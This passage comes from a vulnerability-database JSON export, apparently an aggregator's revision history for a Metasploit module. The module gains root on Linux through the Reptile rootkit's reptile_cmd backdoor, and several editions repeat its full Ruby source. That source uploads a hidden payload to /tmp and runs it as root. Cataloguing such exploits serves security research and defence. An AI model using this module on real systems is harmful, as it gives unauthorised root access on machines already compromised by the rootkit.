"MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-31T21:45:20", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "krebs", "idList": ["KREBS:6AFCF9CC85DE8C16D191205281E725CB"]}, {"type": "threatpost", "idList": ["THREATPOST:39E254C79ECA5F7B8EDBB5E39BABCB6C"]}, {"type": "github", "idList": ["GHSA-763G-FQQ7-48WG"]}, {"type": "talosblog", "idList": ["TALOSBLOG:4C073D825207102B86D0C8999A5A28CC"]}, {"type": "kitploit", "idList": ["KITPLOIT:6474089099230097688"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892087", "OPENVAS:1361412562310704611", "OPENVAS:1361412562310892088", "OPENVAS:1361412562310892090", "OPENVAS:1361412562310892089", "OPENVAS:1361412562310892078"]}, {"type": "virtuozzo", "idList": ["VZA-2020-010"]}, {"type": "exploitdb", "idList": ["EDB-ID:47986", "EDB-ID:47985"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4816"]}, {"type": "cve", "idList": ["CVE-2015-0949", "CVE-2020-8092"]}, {"type": "f5", "idList": ["F5:K53737506"]}, {"type": "mssecure", "idList": ["MSSECURE:9FC0B7963F9AFCB1D44D9117228479ED"]}], "modified": "2020-01-31T21:45:20"}, "score": {"value": 3.8, "vector": "NONE", "modified": "2020-01-31T21:45:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-31T21:45:20", "differentElements": ["sourceData"], "edition": 18}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-01-31T23:34:10", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "krebs", "idList": ["KREBS:6AFCF9CC85DE8C16D191205281E725CB"]}, {"type": "threatpost", "idList": ["THREATPOST:39E254C79ECA5F7B8EDBB5E39BABCB6C"]}, {"type": "github", "idList": ["GHSA-763G-FQQ7-48WG"]}, {"type": "talosblog", "idList": ["TALOSBLOG:4C073D825207102B86D0C8999A5A28CC"]}, {"type": "kitploit", "idList": ["KITPLOIT:6474089099230097688"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704611", "OPENVAS:1361412562310892087", "OPENVAS:1361412562310892088", "OPENVAS:1361412562310892089", "OPENVAS:1361412562310892090", "OPENVAS:1361412562310892078"]}, {"type": "cert", "idList": ["VU:390745"]}, {"type": "virtuozzo", "idList": ["VZA-2020-010", "VZA-2020-012"]}, {"type": "exploitdb", "idList": ["EDB-ID:47986", "EDB-ID:47985"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4816"]}, {"type": "cve", "idList": ["CVE-2015-0949"]}, {"type": "f5", "idList": ["F5:K53737506"]}], "modified": "2020-01-31T23:34:10"}, "score": {"value": 5.0, "vector": "NONE", "modified": "2020-01-31T23:34:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-01-31T23:34:10", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-01T08:08:43", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "krebs", "idList": ["KREBS:6AFCF9CC85DE8C16D191205281E725CB"]}, {"type": "threatpost", "idList": ["THREATPOST:39E254C79ECA5F7B8EDBB5E39BABCB6C"]}, {"type": "github", "idList": ["GHSA-763G-FQQ7-48WG"]}, {"type": "talosblog", "idList": ["TALOSBLOG:4C073D825207102B86D0C8999A5A28CC"]}, {"type": "kitploit", "idList": ["KITPLOIT:6474089099230097688"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704611", "OPENVAS:1361412562310892087", "OPENVAS:1361412562310892088", "OPENVAS:1361412562310892089", "OPENVAS:1361412562310892090", "OPENVAS:1361412562310892078"]}, {"type": "cert", "idList": ["VU:390745"]}, {"type": "virtuozzo", "idList": ["VZA-2020-010", "VZA-2020-012"]}, {"type": "exploitdb", "idList": ["EDB-ID:47986", "EDB-ID:47985"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-4816"]}, {"type": "cve", "idList": ["CVE-2015-0949"]}, {"type": "f5", "idList": ["F5:K53737506"]}], "modified": "2020-01-31T23:34:10"}, "score": {"value": 5.0, "vector": "NONE", "modified": "2020-01-31T23:34:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-01T08:08:43", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-01T09:50:17", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "pentestit", "idList": ["PENTESTIT:0F9228CBE60270D111024D42D0D18C2F"]}, {"type": "cve", "idList": ["CVE-2014-8141", "CVE-2014-8321", "CVE-2014-8139", "CVE-2014-8140", "CVE-2019-3016", "CVE-2016-2031", "CVE-2014-4859", "CVE-2014-4860", "CVE-2013-5116", "CVE-2013-5112"]}, {"type": "krebs", "idList": ["KREBS:6AFCF9CC85DE8C16D191205281E725CB"]}, {"type": "threatpost", "idList": ["THREATPOST:39E254C79ECA5F7B8EDBB5E39BABCB6C"]}, {"type": "github", "idList": ["GHSA-763G-FQQ7-48WG"]}, {"type": "slackware", "idList": ["SSA-2020-031-01"]}, {"type": "talosblog", "idList": ["TALOSBLOG:4C073D825207102B86D0C8999A5A28CC"]}, {"type": "kitploit", "idList": ["KITPLOIT:6474089099230097688"]}, {"type": "cert", "idList": ["VU:390745"]}, {"type": "nessus", "idList": ["FEDORA_2020-D18D24C943.NASL"]}], "modified": "2020-02-01T09:50:17"}, "score": {"value": 4.4, "vector": "NONE", "modified": "2020-02-01T09:50:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-01T09:50:17", "differentElements": ["sourceData"], "edition": 21}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-01T23:44:39", "history": [], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:1885570689170235238", "KITPLOIT:6474089099230097688"]}, {"type": "pentestit", "idList": ["PENTESTIT:0F9228CBE60270D111024D42D0D18C2F"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2092-1:27E54"]}, {"type": "cve", "idList": ["CVE-2014-8141", "CVE-2014-8321", "CVE-2014-8140", "CVE-2014-8139", "CVE-2019-3016", "CVE-2016-2031", "CVE-2014-4859", "CVE-2014-4860", "CVE-2013-5116", "CVE-2013-5112"]}, {"type": "krebs", "idList": ["KREBS:6AFCF9CC85DE8C16D191205281E725CB"]}, {"type": "threatpost", "idList": ["THREATPOST:39E254C79ECA5F7B8EDBB5E39BABCB6C"]}, {"type": "github", "idList": ["GHSA-763G-FQQ7-48WG"]}, {"type": "slackware", "idList": ["SSA-2020-031-01"]}, {"type": "talosblog", "idList": ["TALOSBLOG:4C073D825207102B86D0C8999A5A28CC"]}], "modified": "2020-02-01T23:44:39"}, "score": {"value": 3.6, "vector": "NONE", "modified": "2020-02-01T23:44:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-01T23:44:39", "differentElements": ["sourceData"], "edition": 22}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-02T05:56:35", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "kitploit", "idList": ["KITPLOIT:1885570689170235238", "KITPLOIT:6474089099230097688"]}, {"type": "pentestit", "idList": ["PENTESTIT:0F9228CBE60270D111024D42D0D18C2F"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2092-1:27E54"]}, {"type": "cve", "idList": ["CVE-2014-8141", "CVE-2014-8321", "CVE-2014-8139", "CVE-2014-8140", "CVE-2019-3016", "CVE-2016-2031", "CVE-2014-4859", "CVE-2014-4860", "CVE-2013-5116", "CVE-2013-5112"]}, {"type": "krebs", "idList": ["KREBS:6AFCF9CC85DE8C16D191205281E725CB"]}, {"type": "threatpost", "idList": ["THREATPOST:39E254C79ECA5F7B8EDBB5E39BABCB6C"]}, {"type": "github", "idList": ["GHSA-763G-FQQ7-48WG"]}, {"type": "slackware", "idList": ["SSA-2020-031-01"]}, {"type": "talosblog", "idList": ["TALOSBLOG:4C073D825207102B86D0C8999A5A28CC"]}], "modified": "2020-02-02T05:56:35"}, "score": {"value": 4.1, "vector": "NONE", "modified": "2020-02-02T05:56:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-02T05:56:35", "differentElements": ["sourceData"], "edition": 23}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-05T07:36:15", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:0406", "RHSA-2020:0375", "RHSA-2020:0366", "RHSA-2020:0339", "RHSA-2020:0348", "RHSA-2020:0328"]}, {"type": "threatpost", "idList": ["THREATPOST:AC5C662BF26E10E5F4A8BED545AB2AFE"]}, {"type": "kitploit", "idList": ["KITPLOIT:1588510487292907785", "KITPLOIT:9005556227715072688"]}, {"type": "f5", "idList": ["F5:K64944965", "F5:K11043204"]}, {"type": "mssecure", "idList": ["MSSECURE:8D599A5B631D1251230D906E6D71C774"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0163-1", "OPENSUSE-SU-2020:0156-1"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:7774E9C34F1D54EAD410FE90030164D5"]}, {"type": "exploitdb", "idList": ["EDB-ID:47995"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33894"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143439"]}], "modified": "2020-02-05T07:36:15"}, "score": {"value": 3.8, "vector": "NONE", "modified": "2020-02-05T07:36:15"}}, "objectVersion": "1.4", "sourceHref": 